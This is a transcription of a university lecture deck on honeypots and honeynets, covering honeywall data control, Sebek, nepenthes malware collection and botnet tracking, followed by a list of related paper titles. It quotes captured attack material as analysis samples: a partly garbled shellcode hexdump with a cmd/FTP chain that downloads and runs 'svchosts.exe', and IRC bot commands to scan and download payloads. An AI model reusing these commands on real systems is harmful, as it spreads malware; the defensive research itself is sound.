Honeypots UNIVERSITÄT MANNHEIM. A quick overview. Pi1 - Laboratory for Dependable Distributed Systems
|
|
- Dina Phelps
- 8 years ago
- Views:
Transcription
1 Honeypots A quick overview Pi1 - Laboratory for Dependable Distributed Systems
2 Outline Motivation High-interaction vs. low-interaction honeypots Gen III honeynets honeyd nepenthes Examples
3 Intro We see more and more abuses of communication systems (but only the outcome!) Spam & Phishing Bots & Botnets Cracker exploiting vulnerabilities... How can we learn more about this threat? Know Your Enemy
4 Basic Problem How can we defend against an enemy, when we don t even know who the enemy is?
5 Honeypot History The Cuckoo s Egg (Clifford Stoll) DTK (Fred Cohen) Honeyd (Niels Provos) Honeynet A honeypot Project Code is an information Mantrap system (jails - ressource Symantec) whose value lies in unauthorized or illicit use Specter (Netsec - specter.com) of that ressource. KFSensor (Keyfocus.net) Network Telescopes / Sinkholes Large setups at AV Companies
6 High- vs. Lowinteraction The fundamental difference
7 Different Approaches High-interaction Low-interaction Real services, OS s, or applications Emulation of TCP/IP stack, vulnerabilities,... Higher risk Lower risk Hard to deploy / maintain Easy to deploy / maintain Capture extensive amount of information Example: Gen III honeynets Capture quantitative information about attacks Examples: honeyd, nepenthes, labrea,...
8 Honeynets Network of high-interaction honeypot designed to capture in-depth information. Information has different value to different organizations. It is an architecture you populate with live systems, not a product or software. Any traffic entering or leaving is suspect.
9 GenIII Architecture Setup at German Honeynet Project
10 Concept Honeynet is highly controlled network Every packet that enters or leaves the network is by definition suspicious Three basic blocks Data Analysis Data Control Data Capture } Honeywall
11 Honeywall Transparent bridge Easiest way to deploy Honeywall Linux 2.6 or 2.4 with ebtables-patch Hardened system Three interfaces for routing & management GenIII honeynets: Roo Honeywall CDROM (more on that later)
12 Data Control What happens after a compromise? Possibly malicious! Legal issues?
13 Data Control Data Control enables mechanism to control incoming and outgoing traffic Mitigate risk! Usage of IPS snort_inline
14 Data Control Snort_inline ( Modification of IDS Snort New rules drop, replace & reject Example rules used for botnet tracking alert tcp $HOME any <> $EXTERNAL any (msg:"irc topic"; flow:established; content:"topic"; nocase; replace:"t0pic";) drop tcp $HOME any <> $EXTERNAL 445 (msg:"bot-scan"; flow:established;)
15 Data Control In addition to exploits, DDoS attacks also pose a threat Connection-limiting via iptables Enable some outgoing connections so that attacker can get tool and connect to IRC ### Set the connection outbound limits for different protocols. SCALE="day" TCPRATE="15" UDPRATE="20" ICMPRATE="50" OTHERRATE="15" # IPsec, IPv6 tunnel, and # other non-ip proto 1, 6, 17
16 Data Capture How do you observe an intruder without him noticing? How can you observe encrypted sessions? tcpdump/tethereal is worthless How can you observe the keystrokes? How can you observe the execution flow of a program?
17 Data Capture: Sebek Simple script can t log activity of programs Use rootkit-based techniques to observe the intruder! Sebek Hidden kernel module that captures (almost) all activity Dumps activity to the network Attacker can t sniff any traffic since TCP/IP stack of all honeypots is modified
18 Data Capture: Sebek Figure 2
19 Data Capture: Sebek Thorsten Holz Figure Reaktive 3 Sicherheit - Honeynets - Universität Dortmund
20 Data Analysis Most work has to be done in the area of Data Analysis Lots of manual analysis tethereal, p0f, tcpflow, custom scripts,... Analysis of IRC logs Analysis of obtained tools Profiling of attackers?...
21 Roo Honeywall Based on Fedora Core 3 Automated, headless installation Web-based interface ( Walleye ) for administration and Data Analysis Balas, Viecco: Towards a Third Generation Data Capture Architecture for Honeynets, IEEE Information Assurance Workshop, 2005
22 Low-interaction No real systems, just emulation honeyd ( Emulation of TCP/IP stacks Fool fingerprinting tools like nmap Scripts can simulate service nepenthes ( Emulate vulnerable parts of services Collect autonomous spreading malware
23 nepenthes Tool to automatically collect malware like bots and other autonomous spreading malware Emulate known vulnerabilities and download malware trying to exploit these vulnerabilities Available at
24 Architecture Modular architecture Vulnerability modules Shellcode handler Download modules Submission modules Trigger events Shell-emulation and virtual filesystem
25 Schematic overview
26 Vulnerability modules Emulate vulnerable services Play with exploits until they send us their payload (finite state machine) Currently more than 20 available vulnerability modules More in development Analysis of known vulnerabilities & exploits necessary Automation possible?
27 Shellcode modules Automatically extract URL used by malware to transfer itself to compromised machine sch_generic_xor Generic XOR decoder sch_generic_createprocess sch_generic_url sch_generic_cmd
28 [ dia ] = [ hexdump(0x1bf7bb68, 0x000010c3) ] = [ dia ] 0x bf ff 53 4d c8...smb s... [ dia ] 0x [ dia ] 0x c ff a [ dia ] 0x e d e ~......~.` [ dia ] 0x a b a e 30..z n0 [ dia ] 0x a a j...f#..b... [ dia ] 0x AAAAAAAA AAAAAAAA [...] [ dia ] 0x cmd 41 /c AAAAAAAA AAAAAAAA [ dia ] 0x echo open 0c a >> ii..#..w.. &...B.B. [ dia ] 0x c4 54 f2 ff ff fc e b B.B..T.....F... [ dia ] 0x echo 3c 8b 7c user a ef a 8b 4f 18 8b 5f 20 >> 01 eb ii E<..x.. &.O.._.. [ dia ] 0x0490 e3 echo 2e 49 8b binary 34 8b 01 ee 31 c0 99 ac 84 c0 >> ii..i.4... & 1...t. [ dia ] 0x04a0 c1 ca 0d 01 c2 eb f4 3b e3 8b 5f 24...; T$.u.._$ [ dia ] 0x04b0 01 echo eb 66 8b get 0c 4b svchosts.exe 8b 5f 1c 01 eb 8b 1c 8b >> 01 eb ii..f..k._ &... [ dia ] 0x04c0 89 echo 5c bye c3 31 c0 64 8b c0 78 >> 0f 8b ii.\$..1.d &.@0..x.. [ dia ] 0x04d0 40 0c 8b 70 1c ad 8b e9 0b b [ dia ] 0x04e c b 68 3c 5f 31 f eb 0d 4....h <_1.`V.. [ dia ] 0x04f0 68 ftp ef -n ce e0 -v 60 -s:ii fe & 8a 0e 57 ff e7 e8 ee ff h...`h....w... [ dia ] 0x0500 ff ff 63 6d f f 20 6f 70..cmd /c echo op del ii & [ dia ] 0x e e e e en [ dia ] 0x svchosts.exe e 3e >> ii &ech [ dia ] 0x0530 6f e 3e o user a a >> ii [ dia ] 0x f e e 3e &echo b inary >> [ dia ] 0x0550 ftp://a:a@ /svchosts.exe f ii &ech o get sv [ dia ] 0x f e e 3e chosts.e xe >> ii [ dia ] 0x f e 3e &echo b ye >> ii [ dia ] 0x d 6e 20 2d d 73 3a 69 &ftp -n -v -s:i [ dia ] 0x c f i &del i i &svcho [ dia ] 0x05a e d 0a sts.exe...bbbbbb [ dia ] 0x05b BBBBBBBB BBBBBBBB
29 Statistics: nepenthes Four months nepenthes on /18 network: 50,000,000+ files downloaded 14,000+ unique binaries based on md5sum ~1,000 different botnets Anti-virus engines detect between 70% and 90% of the binaries Korgobot/Padobot dominates
30 Examples What have we learned?
31 Phishing Phishing incidents in UK and Germany Compromise Phishing website Phishing s or: redirection of traffic Learned more about typical proceeding of attackers
32 Botnets Botnet: network of compromised machines that can be remotely controlled by an attacker Mainly used for DDoS, spam, identity theft,... Capture bot samples with the help of honeypots Observing botnets for mitigation Attacker Bot C&C Server $advscan dcom b Bot IRC hax0r.example.com 3267/TCP Bot
33 Conclusion Honeypots allow us to learn more about attacks Lure in attackers and study them in a fish-bowl environment Easy to setup, maintenance is harder We can for example learn more about phishing Proceeding by attackers Other use cases for honeypots include credit card fraud, collecting malware, botnet tracking, web-based attacks, client-side attacks,...
34 Thorsten Holz More information: Pi1 - Laboratory for Dependable Distributed Systems
35 CWSandbox
36 Example Mocbot & MS06-040
37 Introduction MS Security Bulletin MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (August 8, 2006) PoC exploit released a couple of days later Botnets quickly adopt new infection vector Now: tracking of one botnet that uses this vulnerability gzn.lx.irc-xxx.org:45130 Main channel: ##Xport## Nick: RBOT DEU XP-SP
38 ##Xport## 00:06 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :06 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT USA 2K-90511> [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT ITA 2K-89428> [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT PRT XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT F USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :07 < RBOT FRA 2K-22302> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT GBR XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT USA 2K-54815> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT ITA 2K-39418> [Main]: This is the first time that Rbot v2 is running on: :08 < RBOT F ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT BRA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :09 < RBOT DEU XP-SP > [Main]: This is the first time that Rbot v2 is running on: :10 < RBOT ESP 2K-80303> [Main]: This is the first time that Rbot v2 is running on: :10 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT CHN 2K-65840> [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT F ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT VEN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :11 < RBOT FRA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :12 < RBOT JPN XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT DEU XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT USA XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT ITA 2K-77534> [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT DNK XP-SP > [Main]: This is the first time that Rbot v2 is running on: :13 < RBOT ESP XP-SP > [Main]: This is the first time that Rbot v2 is running on: :15 < RBOT JPN 2K-94205> [Main]: This is the first time that Rbot v2 is running on: :15 < RBOT BRA XP-SP > [Main]: This is the first time that Rbot v2 is running on:
39 Channels ##Xport##:.ircraw join ##scan##,##dr##, ##frame##,##o## ##scan##:.scan netapi r -b -s $$ ##DR##:.download webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s $$ ##frame##:.download loadadv518.exe c:\frm.exe 1 -s * ##o##:.download nads.exe c:\nds.exe 1 -s
40 DollarRevenue
41 Economics of Botnets $ grep US log wc -l 998 $ grep CAN log wc -l 20 $ grep GBR log wc -l 103 $ grep CHN log wc -l 756 $ egrep -v "US CAN GBR CHN log wc -l * * * * * 0.02 = $
Towards Automated Botnet Detection and Mitigation
Towards Automated Botnet Detection and Mitigation Stopping the Root Cause of Spam Pi1 - Laboratory for Dependable Distributed Systems Outline Motivation Tools & techniques for botnet detection nepenthes
More informationHoneypots / honeynets
Honeypots / honeynets presentatie naam 1 Agenda Honeypots Honeynets Honeywall presentatie naam 2 Traffic Problem: Vast quantities of normal traffic Find suspect bits presentatie naam 3 Honeypot Machine
More informationVirtual Honeypots UNIVERSITÄT MANNHEIM. Know Your Enemy. Pi1 - Laboratory for Dependable Distributed Systems
Virtual Honeypots Know Your Enemy Pi1 - Laboratory for Dependable Distributed Systems Outline Honeypot 101 Examples honeyd nepenthes Honeyclients Conclusion Honeypots Network-based measurements often show
More informationThe Honeynet Project: Data Collection Tools, Infrastructure, Archives and Analysis
The Honeynet Project: Data Collection Tools, Infrastructure, Archives and Analysis David Watson The UK Honeynet Project Chapter david@honeynet.org.uk Jamie Riden The UK Honeynet Project Chapter jamie@honeynet.org.uk
More informationSecond-generation (GenII) honeypots
Second-generation (GenII) honeypots Bojan Zdrnja CompSci 725, University of Auckland, Oct 2004. b.zdrnja@auckland.ac.nz Abstract Honeypots are security resources which trap malicious activities, so they
More informationHONEYPOT SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region
HONEYPOT SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without
More informationHoneypots and Honeynets Technologies
New Mexico State University Honeypots and Honeynets Technologies Hussein Al-Azzawi Final Paper CS 579 Special Topics / Computer Security Nov. 27, 2011 Supervised by Mr. Ivan Strnad Table of contents: 1.
More informationAdaptability of IRC Botnet Detection Method to P2P Botnet Detection
Adaptability of IRC Botnet Detection Method to P2P Botnet Detection Ji, Yuan Department of Electrical Engineering and Computer Science University of California, Irvine yji1@uci.edu John, Robin Department
More informationdetection AT R W T H A A C H E N U N I V E R S I T Y, W I T H J A N G Ö B E L, J E N S H E K T O R, A N D T H O R S T E N H O L Z
J A N G Ö B E L, J E N S H E K T O R, A N D T H O R S T E N H O L Z advanced honeypot-based intrusion detection Jan Göbel has an M.Sc.in computer science from RWTH Aachen University and wrote his diploma
More informationContents. vii. Preface. P ART I THE HONEYNET 1 Chapter 1 The Beginning 3. Chapter 2 Honeypots 17. xix
Honeynet2_bookTOC.fm Page vii Monday, May 3, 2004 12:00 PM Contents Preface Foreword xix xxvii P ART I THE HONEYNET 1 Chapter 1 The Beginning 3 The Honeynet Project 3 The Information Security Environment
More informationSecuring the system using honeypot in cloud computing environment
Volume: 2, Issue: 4, 172-176 April 2015 www.allsubjectjournal.com e-issn: 2349-4182 p-issn: 2349-5979 Impact Factor: 3.762 M. Phil Research Scholar, Department of Computer Science Vivekanandha College
More informationTaxonomy of Hybrid Honeypots
2011 International Conference on Network and Electronics Engineering IPCSIT vol.11 (2011) (2011) IACSIT Press, Singapore Taxonomy of Hybrid Honeypots Hamid Mohammadzadeh.e.n 1, Masood Mansoori 2 and Roza
More informationProject Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology Project Proposal 1 Project Proposal 2 Abstract Honeypot systems are readily used by organizations large and
More informationDynamic Honeypot Construction
Dynamic Honeypot Construction 2nd Annual Alaska Information Assurance Workshop Christopher Hecker U. of Alaska, Fairbanks 9-5-2006 Presentation l Brief Introduction l Project Overview l Future Work l References
More informationDISTRIBUTED LOW-INTERACTION HONEYPOT SYSTEM TO DETECT BOTNETS
DISTRIBUTED LOW-INTERACTION HONEYPOT SYSTEM TO DETECT BOTNETS GONG JIAN 2 jgong@njnet.edu.cn Jiangsu Key Laboratory of Computer Networking Technology, China, Nanjing, Southeast University AHMAD JAKALAN
More informationCatching hackers using a virtual honeynet: A case study
Catching hackers using a virtual honeynet: A case study D.N. Pasman d.n.pasman@student.utwente.nl ABSTRACT This paper presents an evaluation of honeypots used for gathering information about the methods
More informationThe Nepenthes Platform: An Efficient Approach to Collect Malware
The Nepenthes Platform: An Efficient Approach to Collect Malware Paul Baecher 1, Markus Koetter 1,ThorstenHolz 2, Maximillian Dornseif 2, and Felix Freiling 2 1 Nepenthes Development Team nepenthesdev@gmail.com
More informationUSE HONEYPOTS TO KNOW YOUR ENEMIES
USE HONEYPOTS TO KNOW YOUR ENEMIES SHERIF MOUSA (EG-CERT) 9 MAY 2012 WHAT ARE WE GOING TO TALK ABOUT? What exactly happens on the end of your Internet connection. Open Source tools to set up your own Honeypot
More informationAdvanced Honeypot Architecture for Network Threats Quantification
Advanced Honeypot Architecture for Network Threats Quantification Mr. Susheel George Joseph M.C.A, M.Tech, M.Phil(CS) (Associate Professor, Department of M.C.A, Kristu Jyoti College of Management and Technology,
More informationUsing honeypots to study skill level of attackers based on the exploited vulnerabilities in the network
lentoutigo Master of Science Thesis in the Master Degree Programme, Secure and Dependable Computer Systems Using honeypots to study skill level of attackers based on the exploited vulnerabilities in the
More informationAnalyzing Internet Attacks with Honeypots. Ioannis Koniaris ikoniaris@gmail.com
Analyzing Internet Attacks with Honeypots Ioannis Koniaris ikoniaris@gmail.com Workshop outline About me Workshop outline Cyber threats and countermeasures Information and systems security Human threat
More informationData Collection and Data Analysis in Honeypots and Honeynets
Data Collection and Data Analysis in Honeypots and Honeynets Pavol Sokol, Patrik Pekarčík, Tomáš Bajtoš pavol.sokol@upjs.sk, patrik.pekarcik@upjs.sk, tomas.bajtos@student.upjs.sk Institute of Computer
More informationCountermeasure for Detection of Honeypot Deployment
Proceedings of the International Conference on Computer and Communication Engineering 2008 May 13-15, 2008 Kuala Lumpur, Malaysia Countermeasure for Detection of Honeypot Deployment Lai-Ming Shiue 1, Shang-Juh
More informationUse of Honeypots to Increase Awareness regarding Network Security
Use of Honeypots to Increase Awareness regarding Network Security Bhumika, Vivek Sharma Abstract Honeypots are closely monitored decoys that are employed in a network to study the trail of hackers and
More informationUse of Honeypot and IP Tracing Mechanism for Prevention of DDOS Attack
Use of Honeypot and IP Tracing Mechanism for Prevention of DDOS Attack Shantanu Shukla 1, Sonal Sinha 2 1 Pranveer Singh Institute of Technology, Kanpur, Uttar Pradesh, India 2 Assistant Professor, Pranveer
More informationMultifaceted Approach to Understanding the Botnet Phenomenon
Multifaceted Approach to Understanding the Botnet Phenomenon Christos P. Margiolas University of Crete A brief presentation for the paper: Multifaceted Approach to Understanding the Botnet Phenomenon Basic
More informationDaniel Meier & Stefan Badertscher
Daniel Meier & Stefan Badertscher 1. The definition of Honeypots 2. Types of Honeypots 3. Strength and Weaknesses 4. Honeypots in action 5. Conclusions 6. Questions 7. Discussion A honeypot is an information
More informationAgenda. Taxonomy of Botnet Threats. Background. Summary. Background. Taxonomy. Trend Micro Inc. Presented by Tushar Ranka
Taxonomy of Botnet Threats Trend Micro Inc. Presented by Tushar Ranka Agenda Summary Background Taxonomy Attacking Behavior Command & Control Rallying Mechanisms Communication Protocols Evasion Techniques
More informationMedium Interaction Honeypots
Medium Interaction Honeypots Georg Wicherski April 7, 2006 Abstract Autonomously spreading malware has been a global threat to the Internet Community ever since the existence of the Internet as a large-scale
More informationBanking Security using Honeypot
Banking Security using Honeypot Sandeep Chaware D.J.Sanghvi College of Engineering, Mumbai smchaware@gmail.com Abstract New threats are constantly emerging to the security of organization s information
More informationOperation Liberpy : Keyloggers and information theft in Latin America
Operation Liberpy : Keyloggers and information theft in Latin America Diego Pérez Magallanes Malware Analyst Pablo Ramos HEAD of LATAM Research Lab 7/7/2015 version 1.1 Contents Introduction... 3 Operation
More informationHONEYD (OPEN SOURCE HONEYPOT SOFTWARE)
HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) Author: Avinash Singh Avinash Singh is a Technical Evangelist currently worksing at Appin Technology Lab, Noida. Educational Qualification: B.Tech from Punjab Technical
More informationspying with bots spying with bots
spying with bots T HORSTEN HOLZ spying with bots Thorsten Holz is a research student at the Laboratory for Dependable Distributed Systems at RWTH Aachen University. He is one of the founders of the German
More information[Kapse*, 4.(10): October, 2015] ISSN: 2277-9655 (I2OR), Publication Impact Factor: 3.785
IJESRT INTERNATIONAL JOURNAL OF ENGINEERING SCIENCES & RESEARCH TECHNOLOGY IDENTIFICATION OF ATTACKERS BY USING SECURITY SERVICES OF HONEYPOT Dinesh S. Kapse*, Prof. Vijay Bagdi * WCC DEPT. A.G.P.C.O.E,
More informationGuide to Computer Forensics and Investigations, Second Edition
Guide to Computer Forensics and Investigations, Second Edition Chapter 12 Network Forensics Objectives Understand Internet fundamentals Understand network basics Acquire data on a Linux computer Guide
More informationISA 674 Intrusion Detection
ISA 674 Intrusion Detection Inviting the attacker to come to you: HoneyPots & HoneyClients! Angelos Stavrou, George Mason University! Honeypots Honeypots are real or emulated vulnerable systems ready to
More informationHow to build and use a Honeypot. Ralph Edward Sutton, Jr. DTEC 6873 Section 01
How to build and use a Honeypot By Ralph Edward Sutton, Jr DTEC 6873 Section 01 Abstract Everybody has gotten hacked one way or another when dealing with computers. When I ran across the idea of a honeypot
More information[ X OR DDoS T h r e a t A d v i sory] akamai.com
[ X OR DDoS T h r e a t A d v i sory] akamai.com What is the XOR DDoS threat The XOR DDoS botnet has produced DDoS attacks from a few Gbps to 150+ Gbps The gaming sector has been the primary target, followed
More informationAnti-Malware Technologies
: Trend of Network Security Technologies Anti-Malware Technologies Mitsutaka Itoh, Takeo Hariu, Naoto Tanimoto, Makoto Iwamura, Takeshi Yagi, Yuhei Kawakoya, Kazufumi Aoki, Mitsuaki Akiyama, and Shinta
More informationThe HoneyNet Project Scan Of The Month Scan 27
The HoneyNet Project Scan Of The Month Scan 27 23 rd April 2003 Shomiron Das Gupta shomiron@lycos.co.uk 1.0 Scope This month's challenge is a Windows challenge suitable for both beginning and intermediate
More informationKeywords Intrusion detection system, honeypots, attacker, security. 7 P a g e
HONEYPOTS IN NETWORK SECURITY Abhishek Sharma Research Scholar Department of Computer Science and Engineering Lovely Professional University (Punjab) - India Abstract Computer Network and Internet is growing
More informationBotnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks Felix C. Freiling, Thorsten Holz, and Georg Wicherski Laboratory for Dependable Distributed Systems,
More informationLesson 5: Network perimeter security
Lesson 5: Network perimeter security Alejandro Ramos Fraile aramosf@sia.es Tiger Team Manager (SIA company) Security Consulting (CISSP, CISA) Perimeter Security The architecture and elements that provide
More informationCharacterizing the IRC-based Botnet Phenomenon
Reihe Informatik. TR-2007-010 Characterizing the IRC-based Botnet Phenomenon Jianwei Zhuge 1, Thorsten Holz 2, Xinhui Han 1, Jinpeng Guo 1, and Wei Zou 1 1 Peking University 2 University of Mannheim Institute
More informationIDS / IPS. James E. Thiel S.W.A.T.
IDS / IPS An introduction to intrusion detection and intrusion prevention systems James E. Thiel January 14, 2005 S.W.A.T. Drexel University Overview Intrusion Detection Purpose Types Detection Methods
More informationDETECTING AND ANALYZING NETWORK ATTACKS USING VIRTUAL HONEYNET NUR ATIQAH BT. HASAN 2003470954
DETECTING AND ANALYZING NETWORK ATTACKS USING VIRTUAL HONEYNET By NUR ATIQAH BT. HASAN 2003470954 In partial fulfillment of requirement for the BACHELOR OF SCIENCE (Hons.) IN DATA COMMUNICATION AND NETWORKING
More informationCS 356 Lecture 17 and 18 Intrusion Detection. Spring 2013
CS 356 Lecture 17 and 18 Intrusion Detection Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists
More informationNETWORK SECURITY (W/LAB) Course Syllabus
6111 E. Skelly Drive P. O. Box 477200 Tulsa, OK 74147-7200 NETWORK SECURITY (W/LAB) Course Syllabus Course Number: NTWK-0008 OHLAP Credit: Yes OCAS Code: 8131 Course Length: 130 Hours Career Cluster: Information
More informationLecture 11: Infrastructure Defense
ENTS 689i Lecture 11: Infrastructure Defense Part III: Network Security Part III: Outline November 20 (Today) Network Architecture Access Control Firewalls Intrusion Detection Systems Anomaly Detection
More informationCourse Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)
Page 1 of 6 Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits) TNCC Cybersecurity Program web page: http://tncc.edu/programs/cyber-security Course Description: Encompasses
More informationCollecting Autonomous Spreading Malware Using High-Interaction Honeypots
Collecting Autonomous Spreading Malware Using High-Interaction Honeypots Jianwei Zhuge 1, Thorsten Holz 2, Xinhui Han 1, Chengyu Song 1, and Wei Zou 1 1 Institute of Computer Science and Technology, Peking
More informationHoneypots in Network Security
Degree Project Honeypots in Network Security Deniz Akkaya Fabien Thalgott 2010-06-29 Subject: Network Security Level: Bachelor Course code: 2DV00E Abstract Day by day, more and more people are using internet
More informationCS 356 Lecture 25 and 26 Operating System Security. Spring 2013
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control
More informationAdvanced Honeypot System for Analysing Network Security
ISSN: 2347-3215 Volume 2 Number 4 (April-2014) pp. 65-70 www.ijcrar.com Advanced Honeypot System for Analysing Network Security Suruchi Narote 1* and Sandeep Khanna 2 1 Department of Computer Engineering.
More informationHONEYPOTS REVEALED Prepared by:
HONEYPOTS REVEALED Prepared by: Mohamed Noordin Yusuff IT Security Officer Specialist Dip. Info Security, MA. Internet Security Mgmt(Ongoing) 1 INTRODUCTION IT Security instantly becomes an issue for anyone
More informationNetworks and Security Lab. Network Forensics
Networks and Security Lab Network Forensics Network Forensics - continued We start off from the previous week s exercises and analyze each trace file in detail. Tools needed: Wireshark and your favorite
More informationAutonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security
Acta Polytechnica Hungarica Vol. 10, No. 6, 2013 Autonomous Hybrid Honeypot as the Future of Distributed Computer Systems Security Peter Fanfara, Marek Dufala, Ján Radušovský Department of Computers and
More information10 Things Every Web Application Firewall Should Provide Share this ebook
The Future of Web Security 10 Things Every Web Application Firewall Should Provide Contents THE FUTURE OF WEB SECURITY EBOOK SECTION 1: The Future of Web Security SECTION 2: Why Traditional Network Security
More informationNetwork Based Intrusion Detection Using Honey pot Deception
Network Based Intrusion Detection Using Honey pot Deception Dr.K.V.Kulhalli, S.R.Khot Department of Electronics and Communication Engineering D.Y.Patil College of Engg.& technology, Kolhapur,Maharashtra,India.
More informationMalicious Network Traffic Analysis
Malicious Network Traffic Analysis Uncover system intrusions by identifying malicious network activity. There are a tremendous amount of network based attacks to be aware of on the internet today and the
More informationCoimbatore-47, India. Keywords: intrusion detection,honeypots,networksecurity,monitoring
Volume 4, Issue 8, August 2014 ISSN: 2277 128X International Journal of Advanced Research in Computer Science and Software Engineering Research Paper Available online at: www.ijarcsse.com Investigate the
More informationDesign & Implementation of Linux based Network Forensic System using Honeynet
Design & Implementation of Linux based Network Forensic System using Honeynet Jatinder Kaur, Gurpal Singh, Manpreet Singh SMCA, Thapar University, Patiala -147004, India CSE, Ramgharia College, Phagwara,
More informationAdvance Trends in Network Security with Honeypot and its Comparative Study with other Techniques
Advance Trends in Network Security with Honeypot and its Comparative Study with other Techniques Aaditya Jain, Dr. Bala Buksh M.tech (CS & E), Professor (CS & E) R. N. Modi Engineering College, Kota, Rajasthan,
More informationHow To Monitor Attackers On A Network On A Computer Or Network On An Uniden Computer (For Free) (For A Limited Time) (Czechian) (Cybercrime) (Uk) (Cek) (Kolomot
Recent development of tools to monitor attackers Daniel Kouril, Jan Vykopal lastname @ics.muni.cz 43 rd TF-CSIRT meeting 18 September, 2014, Rome, Italy About C4e project Single point of contact in Czech
More informationThe Use of Honeynets to Increase Computer Network Security and User Awareness
The Use of Honeynets to Increase Computer Network Security and User Awareness Sven Krasser, Julian B. Grizzard, Henry L. Owen Georgia Institute of Technology School of Electrical and Computer Engineering
More informationProtecting the Infrastructure: Symantec Web Gateway
Protecting the Infrastructure: Symantec Web Gateway 1 Why Symantec for Web Security? Flexibility and Choice Best in class hosted service, appliance, and virtual appliance (upcoming) deployment options
More informationHoneypot-Architectures using VMI Techniques
Honeypot-Architectures using VMI Techniques Stefan Floeren Betreuer: Nadine Herold, Stephan Posselt Seminar Future Internet SS2013 Lehrstuhl Netzarchitekturen und Netzdienste Fakultät für Informatik, Technische
More informationHow To Protect Your Firewall From Attack From A Malicious Computer Or Network Device
Ch.9 Firewalls and Intrusion Prevention Systems Firewalls: effective means of protecting LANs Internet connectivity is essential for every organization and individuals introduces threats from the Internet
More informationMonitoring the Abuse of Open Proxies for Sending Spam
Monitoring the Abuse of Open Proxies for Sending Spam Klaus Steding-Jessen jessen@cert.br CERT.br Computer Emergency Response Team Brazil NIC.br Network Information Center Brazil CGI.br Brazilian Internet
More informationUsing Honeypots to Analyze Bots and Botnets
Using Honeypots to Analyze Bots and Botnets Eirik Falk Georg Bergande Jon Fjeldberg Smedsrud Master of Science in Communication Technology Submission date: June 2007 Supervisor: Svein Johan Knapskog, ITEM
More informationVolume 2, Issue 3, March 2014 International Journal of Advance Research in Computer Science and Management Studies
Volume 2, Issue 3, March 2014 International Journal of Advance Research in Computer Science and Management Studies Research Article / Paper / Case Study Available online at: www.ijarcsms.com Web Application
More information1! Network forensics
Network Forensics COMP 2555: Principles of Computer Forensics Autumn 2014 http://www.cs.du.edu/2555 1! Network forensics Network Forensics Overview! Systematic tracking of incoming and outgoing traffic!
More informationHoneypots & Honeynets Overview. Adli Wahid Security Specialist, APNIC.net adli@apnic.net
Honeypots & Honeynets Overview Adli Wahid Security Specialist, APNIC.net adli@apnic.net 1 Contents 1. ObjecCves 2. DefiniCon of Honeypot & Honeynets 3. Benefits & Risk consideracon 4. Example of Honeypot
More informationDescription: Course Details:
Course: Malicious Network Traffic Analysis Duration: 5 Day Hands-On Lab & Lecture Course Price: $ 3,495.00 Description: There are a tremendous amount of network based attacks to be aware of on the internet
More informationSpamPots Project: Using Honeypots to Measure the Abuse of End-User Machines to Send Spam
SpamPots Project: Using Honeypots to Measure the Abuse of End-User Machines to Send Spam Marcelo H. P. C. Chaves mhp@cert.br CERT.br Computer Emergency Response Team Brazil NIC.br Network Information Center
More informationEmerging Network Security Threats and what they mean for internal auditors. December 11, 2013 John Gagne, CISSP, CISA
Emerging Network Security Threats and what they mean for internal auditors December 11, 2013 John Gagne, CISSP, CISA 0 Objectives Emerging Risks Distributed Denial of Service (DDoS) Attacks Social Engineering
More informationLocking down a Hitachi ID Suite server
Locking down a Hitachi ID Suite server 2016 Hitachi ID Systems, Inc. All rights reserved. Organizations deploying Hitachi ID Identity and Access Management Suite need to understand how to secure its runtime
More informationAbout Botnet, and the influence that Botnet gives to broadband ISP
About net, and the influence that net gives to broadband ISP Masaru AKAI BB Technology / SBB-SIRT Agenda Who are we? What is net? About Telecom-ISAC-Japan Analyzing code How does net work? BB Technology
More informationDetecting Bots with Automatically Generated Network Signatures
